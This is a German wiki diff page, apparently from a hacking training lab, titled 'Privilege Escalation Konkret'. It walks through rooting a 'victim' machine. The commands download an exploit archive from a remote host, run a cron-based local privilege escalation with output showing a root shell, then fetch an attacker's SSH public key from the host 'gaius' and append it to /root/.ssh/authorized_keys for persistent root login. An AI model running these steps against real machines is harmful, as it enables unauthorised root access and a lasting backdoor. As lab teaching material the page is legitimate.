Privilege Escalation Konkret: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „=Wieder auf den Opfer= ==Exploit runterladen und Ausführungsrecht geben== *cd /tmp *wget http://gaius/hack *chmod +x hack ==Exploit ausfühen== *./hack *id u…“) |
|||
| (6 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
=Wieder auf den Opfer= | =Wieder auf den Opfer= | ||
==Exploit runterladen und Ausführungsrecht geben== | ==Exploit runterladen und Ausführungsrecht geben== | ||
| + | *id | ||
*cd /tmp | *cd /tmp | ||
| − | *wget | + | *wget https://xinux.de/downloads/47164.zip |
| − | * | + | *unzip 47164.zip |
| − | + | *cd cron | |
| − | * | + | *./exploit.cron.sh |
| − | + | <pre> | |
| − | + | [*] Compiling... | |
| − | + | [*] Writing payload to /tmp/payload... | |
| + | [*] Adding cron job... (wait a minute) | ||
| + | [.] starting | ||
| + | [.] setting up namespace | ||
| + | [~] done, namespace sandbox set up | ||
| + | [.] mapping subordinate ids | ||
| + | [.] subuid: 558752 | ||
| + | [.] subgid: 558752 | ||
| + | [~] done, mapped subordinate ids | ||
| + | [.] executing subshell | ||
| + | [+] Success: | ||
| + | -rwsr-xr-x 1 root root 8392 Mar 10 11:24 /tmp/sh | ||
| + | [*] Cleaning up... | ||
| + | [*] Launching root shell: /tmp/sh | ||
| + | id | ||
| + | uid=0(root) gid=0(root) groups=0(root),33(www-data) | ||
| + | </pre> | ||
| + | |||
==id.pub einbauen== | ==id.pub einbauen== | ||
*wget http://gaius/kali-pub | *wget http://gaius/kali-pub | ||
*cat kali-pub >> /root/.ssh/authorized_keys | *cat kali-pub >> /root/.ssh/authorized_keys | ||
| − | *ssh root@10.0. | + | *ssh root@10.0.10.104 |
<pre> | <pre> | ||
The authenticity of host '10.0.5.104 (10.0.5.104)' can't be established. | The authenticity of host '10.0.5.104 (10.0.5.104)' can't be established. | ||
Aktuelle Version vom 14. Mai 2025, 12:49 Uhr
Wieder auf den Opfer
Exploit runterladen und Ausführungsrecht geben
- id
- cd /tmp
- wget https://xinux.de/downloads/47164.zip
- unzip 47164.zip
- cd cron
- ./exploit.cron.sh
[*] Compiling... [*] Writing payload to /tmp/payload... [*] Adding cron job... (wait a minute) [.] starting [.] setting up namespace [~] done, namespace sandbox set up [.] mapping subordinate ids [.] subuid: 558752 [.] subgid: 558752 [~] done, mapped subordinate ids [.] executing subshell [+] Success: -rwsr-xr-x 1 root root 8392 Mar 10 11:24 /tmp/sh [*] Cleaning up... [*] Launching root shell: /tmp/sh id uid=0(root) gid=0(root) groups=0(root),33(www-data)
id.pub einbauen
- wget http://gaius/kali-pub
- cat kali-pub >> /root/.ssh/authorized_keys
- ssh root@10.0.10.104
The authenticity of host '10.0.5.104 (10.0.5.104)' can't be established.
ECDSA key fingerprint is SHA256:5gsfiKQ0L68lsHDiA1+Qw16XsWIhpfv+SzkFKzx/pGE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.5.104' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
System information as of Wed Sep 28 18:55:31 CEST 2022
System load: 0.03 Processes: 149
Usage of /: 22.5% of 17.59GB Users logged in: 1
Memory usage: 25% IP address for eth0: 10.0.5.104
Swap usage: 0% IP address for docker0: 172.17.42.1
Graph this data and manage this system at:
https://landscape.canonical.com/
You have mail.
Last login: Mon Jul 5 15:26:14 2021 from 10.0.10.2
root@opfer:~#